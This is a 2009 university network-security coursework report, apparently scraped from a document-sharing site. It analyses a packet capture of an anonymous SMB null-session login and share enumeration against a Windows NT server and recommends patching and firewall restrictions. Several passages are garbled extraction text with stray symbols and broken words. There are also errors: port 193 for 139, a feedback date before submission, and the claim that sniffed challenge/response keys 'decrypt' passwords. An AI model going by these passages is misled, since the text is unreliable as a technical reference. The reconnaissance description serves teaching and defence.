M.alzhrani Network Security P.andrew Glamorgan

8/8/2019 M.alzhrani Network Security P.andrew Glamorgan

http://slidepdf.com/reader/full/malzhrani-network-security-pandrew-glamorgan 1/21

Final mark awarded ______

UNIVERSITY OF GLAMORGAN

Assessment Cover Sheet and Feedback Form

2009/10

Module Code:SY4S02 Module Title:NETWORK SECURITY Lecturer:PROF A BLYTH

Assignment No:

1 OF 2

No. of pages in total including

this page: 3

Maximum Word Count: 2,500

Word c ount:2581 w

Assignment Title: NETWORK SECURITY FULL TIME COURSE WORK 1

Tasks: see attached

Section A: Record of Submission

Record of Submission and Plagiarism Declaration

I declare that this assignment is my own work and that the sources of information and material I

have used (including the internet) have been fully identified and properly acknowledged as

required in the referencing guidelines provided.

Student Number:09001603

You are required to acknowledge that you have read the above statement by writing your

student number(s) above.

(If this is a group assignment, please provide the student numbers of ALL group members)

Details of Submission

Note that all work handed in after the submission date and within 5 working days will be

capped at 40%. No marks will be awarded if the assignment is submitted after the late

submission date unless mitigating circumstances are applied for and accepted.

y IT IS YOUR RESPONSIBILITY TO KEEP A RECORD OF ALL WORK SUBMITTED.

y An electronic copy of your work should be submitted via Blackboard.

y Work should also be submitted to the member of academic staff responsible for setting your

work.

y Work not submitted to the lecturer responsible may, exceptionally , be submitted (on the

submission date) to the reception of the Faculty of Advanced Technology, which is on the



2nd floor of G block (Room G221) where a receipt will be issued.

Mitigating Circumstances: if there are any exceptional circumstances which may have

affected your ability to undertake or submit this assignment, make sure you contact the

Faculty Advice Shop on 01443 482540 (G221).

Section B: Marking and Assessment

This assignment will be marked out of 100%

This assignment contributes to 50% of the total module marks.

This assignment is bonded / non- bonded. Details: BONDED

It is estimated that you should

spend approximately

70 hours on this assignment.

Date Set: 12TH Oct 2009 Submission Date: 4TH Dec 2009 Feedback Date: 8TH Jan 2009

Learning Outcomes

This assignment addresses the following learning outcome(s) of the

module:

y To demonstrate a systematic understanding of the principles of

security in networks and distributed systems;

y To classify and explain the methods by which computers within

a distributed system communicate;

y To evaluate critically how services are delivered to one another

in a secure manner.

Marking SchemeMarks

Available

Marks

Awarded

1. Introduction and outline of the problems that you haveidentified.

15

2. A detailed description of your proposed solution to the

problems identified.

65





3.4 Logical Organisation /5

Poor organisation of arguments.

Excellent organisation of arguments.The report is crisp, clear and well

presented.

Comments:

3.5 Bibliography / References /5

Poor use of

references

Excellent use of references.

Comments:



ASSESSMENT CRITERIA

Performance Level Criteria

Introduction and

outline of the

problems.

A detailed description of

your solution.

Conclusion Logical Organis

Fail

(<40%)

No clear

understanding

demonstrated.

Key concepts and ideas

missing.

No evidence of

summary and

conclusions.

Confusing stru

and no argume

to the point.

Pass(40%-49%)

Some omissions and

errors of keymaterials.

Some relevant factual

knowledge and/orawareness of issues; a

few errors may be

present.

Poor summary and

conclusions.

Not well struct

enough to makpoint though.

(50%-59%)

Key concepts

introduced, with keys

arguments outlined.

A detailed description of

the topic, showing

insight. Issues are dealt

with in a detailed and

systematic way

Evidence of

summary and

conclusions linked

into

countermeasures.

Evidence of pla

and thought st

development o

argumentation

Merit

(60%-69%)

Clear statement of

the problem/issues

and the argumentused to address them

An accurate and

comprehensive account

is given of relevantmaterial in a way that

demonstrates

Clear evidence of

summary and

conclusions. Aclear statement of

countermeasures.

Well-planned s

and developme

the argument.



understanding.

Distinction

(70% +)

An excellent

statement of theproblem and the

proposed solution.

A systematic explanation

of the topic, whichdemonstrates an

excellent understanding

of the issues.

Excellent summary

and conclusions.There is clear

evidence of

original thinking

Structure that

maps the deveof the argumen



Contents

1. Introduction ................................ ................................ ................................ ........... 8

1.1Authintication process ................................ ................................ .......................8

2. Methodology of the analysis ................................ ................................ ................. 9

3.Packets analysis: ................................ ................................ ................................ ... 10

3.1Client server interaction: ................................ ................................ ................11

1-Client->Server Request (First Level Encoding) 11

2- Server > Client response (session acknowledgement ) 12

3- Client > server Request (Negotiate C IFS dialect ) 12

4- Client <server Response (SMB _NEGOT I ATE ) 13

5- Client>server Request (SESSION_SETUP) 14

6- Client<server Response (SESSION SETUP) 15

7- Client>server Request (TRANSACT ION) 16

8- Client<server Response (TRANSACT ION) 17

4. Scenario: ................................ ................................ ................................ ..............17

5. Conclusion: ................................ ................................ ................................ ..........18

6.Reference: ................................ ................................ ................................ .......19-20

Table of Figures

TABLE 1.2 (C MCNAB 2007) ............................... . ................... ............. ............................ . 9 FIGURE 1.3 (SANDERS, 2007) ............................... . ................... ............. ........................... 10 FIGURE 2 ................................ ................................ ................................ .................... 11 FIGURE 3 ................................ ................................ ................................ .................... 12



M. Alzhrani 09001603, Network Security, Glamorgan University, 2009

8

1. Introduction

Technology in recent years has evolved at an amazingly fast rate to dominate

almost all ways of life. The world has become a global village, where news and

accidents are relayed throughout the whole world in a matter of just seconds. Such

intercommunication requires an intelligent transportation system, as (Comer, 2006)

describes the Internet, " ...the entire technology has been designed to foster communication..."

As the Internet continues extending in a complex manner, network protocols must

be addressed in order to classify communication, data transfer and systemic order.

One of these protocols functions as an application layer called SMB/CIFS, where it

functions through NetBIOS software. It runs over windows computers, as (Hertel,

2003) describes, " These systems participate in NBT networks by directly handling the

TCP and UDP packets". In addition, NetBIOS or NBT function in the session layer (see

table 1.1) as it is assigning stations names to each particular devise or service.

Typically, a client request for a share operation in the network could be sent,

received, opened or a read command, depending on the account given privileges.

This command is processed by a protocol known as Common Internet File System

(CIFS), which is the advanced copy of the Server Message Block (SMB); all of these

operations are sent and carried away by TCP/IP protocol.

It has been said that there is a fundamental serious design flaw, which can be used

to derive a considerable amount of data from a network without raising any

attention. "Microsoft's software is fatally flawed from a security perspective "

(Scambray & McClure, 2007). This essential flaw is located in the Microsoft SMB,

where it could be exploited by enumerating the target server share list and acquiring

vital information via the authentication process. Such a breach is usually patched or

replaced entirely. In this report, I will analyze the packets, and demonstrate the

relative protocols that are associated with the authentication process.

(Sanders, 2007)

1.1Authintication process

To begin with, network sharing systems in this analysis are using firstly,

NetBIOS (Network Basic Input Output System), which is interface software that was

created to manage the network hardware, and it can initiate, start, end and execute

an order. NetBIOS also broadcast sessions via SMB/CIFS protocols.



M l i t it l i it

Sec

¡

¢

£ y

¤ CIFS and S

¥ B

¤ which broadcas

¦ through port (139) that be

£ ongs to

NetBIOS service¤ as shown in (Table1.2). All of these services and protocols work on

the TCP/IP protocol. When a CIFS asks for a broadcast, messages are transported by

establishing a connection using NetBIOS session service as specified in RFC 1001 and

RFC 1002 (Microsoft handbook).

Tabl§

1 ̈2

©

C

Nab 2007

NetBIOS Session is the usual transporter for the SMB packet via the TCP/IP, although

there are three main basic types of NetBIOS as the RFC 1001 and 1002 describes

(Name service, Datagram service and session service). Our concern will be with the

session service. These types of services are responsible for starting a connection by

using the NetBIOS over the TCP. To further elaborate, at every re

uest to a network

or file sharing, the session service starts ac

uiring names for the user/client in the

local network; it could be a unique or shared one, depending on the broadcasting

mechanism, and group names could be shared by more than one client, contrary to

unique ones registering one for each network. (Hertel, 2003)

Based on the security mode, authentication varies. This case study is a

challenge/response one, and in this case an attacker may get the password hash

after sniffing a network and locating both the challenge key and response key. These

keys are used to decrypt the original password through a certain algorithm. This

algorithm is known to both the client and the server, and therefore, when an

intruder tries to break into a system and he knows the keys, the password could be

decrypted by various tools and websites (Hertel, 2003).

2

thodolo

of th

anal

sis

Interestingly, layered packets and Command batching include more than one

protocol or command. Thus, our methodology in this analysis will follow a specific

structure, in order to cover each small and important part. ach packet

ill be

anal

zed based on the p ! io ! it

of the info ! " ation; the vital information will be

documented in tables, pictures or plainte# t. The role of these analyses will follow the

ne # t table in a very particular way $



M l i t it l i it

(Avian Research, 1997)

3 % Packets anal&

sis:

In our analysis, the first three packets connection will start with a full duple '

TCP connection initiated by the client, NetBIOS session request (Three way

handshake) over TCP, as it is described below:

Fi

(

u) e 1

0 3 (Sanders1 2007

2

08/16-15:27:17.820587 193.63.129.192:1843 -> 193.63.129.187:139

TCP TTL: 128 TOS: 0' 0 ID: 48195 IpLen: 20 DgmLen: 44 DF

******S* Seq: 0' F1908361 Ack: 0

' 0 Win: 0

' 2000 TcpLen: 24

TCP Options (1) => MSS: 1460

The packet was sent from network IP-Class (C) at 08/16-15:27:17.820587 from

193.63.129.192 throughout the port 1843. This is considered to be the attacker orthe client, the packet goes straight to the domain controller or the main server

193.63.129.187 received on port 139. (On3 4 5

h6

7

8 9

@

5

@

5 6 p o

7

5 h

6 hand

A h

6 A B C 8 3 3 b

6

ana3 4

z6

d 5 o avo

8 d

9 6 p

6 5 8 5 8 on).

Code Explanation

TCP TTL:128 TCP Protocol, time to live, which is 128

TOS:0D 0 The type of service

ID:48195 The packet id is : 48195



M l i t it l i it

IpLen:20 The IP length is 20

DgmLen:44 DF (DF) means "don't fragment."

******S* Here we see the packet Three way

handshake starting with synchronize to the

target ip

Ack: 0E

0 Acknowledge value here is 0 because it's the first one

Win: 0E 2000 The buff er size the host provides

TcpLen: 24 The TCP Packet Length

TCP Options (1) => MSS: 1460 This is the maximum size of segment packet

can handle before using fragmentation

The following response comes from the server with syn/ack, which indicates that the

server received the client's syn and is ready to make a link with it. Although the

header contains the same structure, the numbers change with each request. In this

packet, it is shown that the Sequence (ISN - Initial Sequence Numbers) equals

0xF1908361 where we can see in the next packet that the Ack number is the sequence number of the next bytewhich is 0xF1908362 (see figure2).

FiF

ure 2

It is commonly known that if the server came back with acknowledge message, then

the connection has been established[MSDN]. The NetBIOS session service already

established a TCP connection via port 139 to send SMB packet, the listener receives a

SG SSION REQUEST via TCP, his replay; however, is a POSITIVE SESSION RESPONSE in

this case. (RFC1001, 1987)

1-Client->Server Request (First Level Encoding)

FiH

ure 3



M l i t it l i it

Packet 1

Description: In this packet, in its role it should contain both client and server

NetBIOS name, and an integer to explain his job. TCP packet must be established in

order to transport the CIFS request to the receiver,which is known as 'calling the

server', therefore, detailed analysis for the Hex took place (Blyth, 2009) (See

appendix A) and resulted in:

Server service NetBIOS name: J4-ITRL-14

Client/workstation NetBIOS name: J4-ITRL-19

The purpose of the packet is 81 00 00 44 -this shoI

s that a connection to share is

wanted from the receiver network. Finally, the IP of the server must be known to

perform the previous connection successfully as we will see in the response packet

(RFC1002, 1987).

2- Server > Client response (session acknowledgement )

Packet 2: 0x82

Description: The first byte 82 indicates, according to figure 3, that this packet is a

response to a successful connection between server and client(Blyth, 2009).

3- Client > server Request (N egotiate CIF S dialect )

Packet 3: SMB_COM _NEGOTIATE





M l i t it l i it

4

Description: At this packet a dialect been chosen by the server, and this along with

an 8byte long key, is returned to the client in order to define the user identity at the

next packet.

Challenge key is: 0X103F5ED8E2243A26

AN 8 BYTE CHALLENGE FROM THE SERVER to the client. The encrypted key is used by

the client to send back a hash key to the server(S Harris et al, 2007).

5- Client>server Request (SE SSION _SETUP )

Packet 5: SMB_COM _SESSION _SETUP _ANDX

Description:

An important part of this packet and future ones:Co Q Q and batchinR

is a network

technique used to reduce network bandwidth by merging two packets in one.In this

packet, the client must send a password and a user name to gain access, in this case

we verif y by the UID field in the next packet; if it does include the UID, then this

packet must include a password, even if it appears like a zero (Microsoft handbook).



M l i t it l i it

5

At this level the responses for the pervious challenge key should be present,

following instructions, no obvious password or challenge were sent in this packet.

The password, user and domain are set to Null, which is what Microsoft describes as

Nell session. A fundamental flaw allows an anonymoususer to start a command and

receive a replay. An anonymous user, however, could enumerate a share list as a

Windows NT f eature, " Also k noS

n as NT U U

sessi on connecti ons"(Microsoft support).

Also, an interesting code has been set in the client capabilities,

smb.server _cap.level _2 _oplocks; this proves that even if authentication is granted, it

is read only privileges (Novell, 2006). The Anonymous account name indicates that it

is a legitimate login. The server resource share path is \\J4-ITRL-14\IPC$ with the IPC

service type, and it is built on top of the tree connect coV V

and- this command is

due because it can access a pipe name or file system (CIFS/1.0, 1997).

6- Client< server Response (SE SSION SETUP )

Packet 6: SMB_COM _SESSION _SETUP _ANDX

Description: No errors were found at this stage, although an error would arise if

there were no password, but in this case the password is not required. Instead 16



M l i t it l i it

bits UID is initiated at this response, and will continue to the last packet, to identif y

the user authentication. The native OS, LAN type and Domain is revealed in the code

as shown in the analysis, and the IPC is available on the server to start the sharing

process (CodeFX, 2001).

In addition, a patched command response also took place with the value 75

[TREE _CONNECT] whereas " A tree connect is perf ormed t o access anW

resource, be it

a filesystem, a pri nter, or a named pi pe." (Ithron, 2000).

7- Client>server Request (TRANS ACTION )

Packet 7: SMB_COM _TRANSACTION 0x25

Description: A client request is initiated by the Remote Administration Protocol

(RAP) (0x0068). The command must be send to the server through PIPE/LANMAN,

whereas a (Remote Procedure Call-RPC) (Application Programming Interface-API)

call is committed, this is sent on the SMB TRANSACTION 0x25 command (Ithron,

2000). The RAP request, however, is a NetServerEnum2 according to the packet,

where it asks the server to list the available sharesor to brows the list of users; this

transaction is through "WrLehDO" path, another specification in the packet, the last

4 bytes of the packet are the types of services (Microsoft handbook).



M l i t it l i it

7

8- Client< server Response (TRANS ACTION )

Packet 8: SMB_COM _TRANSACTION 0x25

Description: The server responses contain the list of the available servers on the

network; it is relatively obvious that the answer to the process is in this packet,

where we can find the list of shares as explained in the analysis table.

4. Scenario:

J4-ITRL-19 started TCP/IP connection via port 193; this is shown in the 3hand cheek.

The second action is a NetBIOS session request to access the hidden share path\\ J4-

ITRL-14 \IPC$ at the local main server. The TREE ANDX gives it the ability to connect

through. A transf er channel is an open throw PIPE/LANMAN where an API call

enumerates the server list of shares.

o NBT Session Client Request SMB Negotiate Protocol Request

SMB Session Setup Request

SMB Tree Connect (to \\ J4-IX Y ̀

-14 \IPC$)

RAP call

RAP response (share/brows list)



M l i t it l i it

5. Conclusion:

Many types of evidence have been revealed during the analysis. The most notable

ones are the Null session login process, IPC Tree connect, and, more interestingly,

the PIPE/LANMAN has also shown that a lot more detail would give claws in the

committed action. All of the previous list of evidences, and the scenario, are

meaningless without the last packet; where the purpose of this dump is exposed.

Thus, from the latest data, I strongly believe it is an exploitation of a fundamental

basic flaw in the Microsoft windows NT4.0 box on a local network, where an

anonymous user can breach the network share list or to view the browse list, and

can enumerate the domain controller.

Since Microsoft considers that the Null session process in obtaining the list of shares

is a normal function, justified by the necessity of the Domain controller to identif y

the active users, it is then rational that some would claim it was complying with

hacking intentions. Intention, however, is another concern I am unable to examine in

detail- as far as we know it is a legal operation committed in user level security,

which does not require any password, with an anonymous account to gain access to

the list of shares on the master server. Hackers, however, could employ tools and

take advantage of the null session process. They would be likely to obtain a variety of

information about a network, as revealed previously in this analysis, such as net use

and net view command (Xfocus, 2001); it is ridiculously easy to launch the Null

session attack, as shown below.

In conclusion, series indicators show that the pervious packets are an information

gathering operation, and the targeted network has been exploited by a ma jor

vulnerability in Windows NTLM authentication process. " And , o f course, t here has

been a l ot o f work on f undament als-patchi ng cod e-lev el vul ner abilities on a regul ar

basis" (Scambray & McClure, 2007). Therefore, there is more than one solution tothe specified weakness; restriction on the null access could be beneficial, but not

entirely, where remote access is exploitable, closing port 139 could be efficient, but

not in a sharing environment. Microsoft solved this issue by adding trusted users to

local groups and disabled the anonymous function in the new released packs.

Moreover, and I would recommend upgrading the box to the last patched virgin of

windows box; parallel with configuring the firewall to certain roles, in order to deter

a potential enumeration process.




19

Reference:

Andrew Blyth, 2009, " The Common Internet File Systems (C IFS) and the Server

Message Block (SMB)", lecture notes distributed in the topic SY4S02 Network

security, Glamorgan University, Pontypridd on 12 Oct 2009.

Avian Research, January 1997, C IFS: Common Insecurities Fail Scrutiny .

CIFS DRAFT1, Mar 1997, a Common Internet File System (C IFS/1.0) Protocol,

available: http://www.microsoft.com/about/legal/protocols/BSTD/CIFS/draft-leach-

cifs-v1-spec-02.txt , Last accessed 21th

of Oct.

CodeFX, 2001, C IFS Explained , Available:

http://www.codefx.com/CIFS_Explained.htm , Last accessed 19th

Oct 2009.

Christopher Hertel, Aug 11 2003, Implementing C IFS: The Common Internet File

System, Prentice Hall, 672 pages.

C McNab, 2007, Network Security Assessment: Know Your Network , second edition,

O'Reilly.

Chris Sanders, May 2007, Practical Packet Analysis Using Wireshark to Solve Real -

World Network Problems.

Douglas E. Comer, 1995, Internetworking with TCP/IP, Vol 1: Principles, Protocols,

and Architecture, Prentice Hall Inc.

Ithron, 2000, Everything Developer , Available:

http://everything2.com/title/CIFS%253A+Common+Insecurities+Fail+Scrutiny+%252

83%2529 , Last accessed 23th Oct 2009.

IBM Corporation, Port 139 NetBIOS, available:

http://www.iss.net/security_center/advice/Exploits/Ports/139/default.htm , Last

accessed 18th of Oct.

J Sambary & S McClure, Dec 2007, Hill Hacking Exposed Windows 3rd, Windows

Security Secrets & Solutions Edition, McGraw.

Microsoft Corporation, Microsoft Networks, SMB F ILE SHARING PROTOCOL,

Document Version 6.0p, Jan 1996, available:

http://www.samba.org/samba/ftp/specs/smbpub.txt , Last accessed 23th of Oct.

Microsoft handbook, MSDN Common Internet File System (CIFS) File Access

Protocol, available:

http://www.microsoft.com/downloads/details.aspx?FamilyID=c4adb584-7ff0-4acf-

bd91-5f7708adb23c , Last accessed 20th

Oct 2009.




20

Microsoft support, March 2007, Restricting information available to anonymous

logon users, Available: http://support.microsoft.com/?scid=kb%3Ben-

us%3B143474&x=7&y=10 , Last accessed 26th Oct 2009.

Novell, Mar 2006, OpLocks on NetWare, available:

http://wiki.novell.com/index.php/OpLocks_on_NetWare , Last accessed 26th Oct

2009.

NetBIOS Working Group, March 1987, Request for Comments: 1001 [RFC], available:

http://ubiqx.org/cifs/rfc-draft/rfc1001.html , Last accessed 25th

of Oct.

Network Working Group, Mar 1987, RFC1002 - Protocol standard for a NetBIOS

service on a TCP/UDP, Available: http://www.faqs.org/rfcs/rfc1002.html , Last

accessed 27th

Oct 2009.

S Harris, A Harper, C Eagle, J Ness, 2007 ,Gray Hat Hacking, The ethical hacker

Handbook , 2edition , McGraw.

Xfocus, 2001, Atlanta, Georgia, available:

http://www.xfocus.net/articles/200305/smbrelay.html , Last accessed 24th of Oct.

APPENDIX A

81 00 00 44 20 45 4B 44 45 43 4E 45 4A 46 45 46 ...D EKDECNEJFEF

43 45 4D 43 4E 44 42 44 45 43 41 43 41 43 41 43 CEMCNDBDECACACAC

41 43 41 43 41 00 20 45 4B 44 45 43 4E 45 4A 46 ACACA. EKDECNEJF

45 46 43 45 4D 43 4E 44 42 44 4A 43 41 43 41 43 EFCEMCNDBDJCACAC

41 43 41 43 41 41 41 00 ACACAAA.

EKDECNEJFEFCEMCNDBDECACACACACACA EKDECNEJFEFCEMCNDBDJCACACACACAAA =32 integer+

32 Integer

IT'S = J4-ITRL-14

E=0x41-0x45=0x04

K=0x41-0x4B=0x0A=4A=J

D=0x41-0x44=0x03

E=0x41-0x45=0x04=34=4

C=0x41-0x43=0x02

N=0x41-0x4E=0x0D=2D=-

E=0x41-0x45=0x04

J=0x41-0x4A=0x09=49=I

F=0x41-0x46=0x05

E=0x41-0x45=0x04=54=T

F=0x41-0x46=0x05

C=0x41-0x43=0x02=52=R

E=0x41-0x45=0x04

M=0x41-0x4D=0x0C=4C=L




C=0x41-0x43=0x02

N=0x41-0x4E=0x0D=2D=-

D=0x41-0x44=0x03

B=0x41-0x42=0x01=31=1

D=0x41-0x44=0x03

E=0x41-0x45=0x04=34=4

C=0x41-0x43=0x02

A=0x41-0x41=0x0=02=START OF TEXTC=0x41-0x43=0x02

A=0x41-0x41=0x0=02= START OF TEXT

C=0x41-0x43=0x02


C=0x41-0x43=0x02


C=0x41-0x43=0x02


C=0x41-0x43=0x02


IT'S = J4-ITRL-19

E=0x41-0x45=0x04K=0x41-0x4B=0x0A=4A=J

D=0x41-0x44=0x03

E=0x41-0x45=0x04=34=4

C=0x41-0x43=0x02

N=0x41-0x4E=0x0D=2D=-

E=0x41-0x45=0x04

J=0x41-0x4A=0x09=49=I

F=0x41-0x46=0x05

E=0x41-0x45=0x04=54=T

F=0x41-0x46=0x05

C=0x41-0x43=0x02=52=R

E=0x41-0x45=0x04

M=0x41-0x4D=0x0C=4C=LC=0x41-0x43=0x02

N=0x41-0x4E=0x0D=2D=-

D=0x41-0x44=0x03

B=0x41-0x42=0x01=31=1

D=0x41-0x44=0x03

J=0x41-0x4A=0x09=39=9

C=0x41-0x43=0x02


C=0x41-0x43=0x02


C=0x41-0x43=0x02


C=0x41-0x43=0x02


C=0x41-0x43=0x02


A=0x41-0x41=0x0

A=0x41-0x41=0x0=00=NULL

Date post:	10-Apr-2018
Category:	Documents
Upload:	securestuff
View:	218 times
Download:	0 times

M.alzhrani Network Security P.andrew Glamorgan

Documents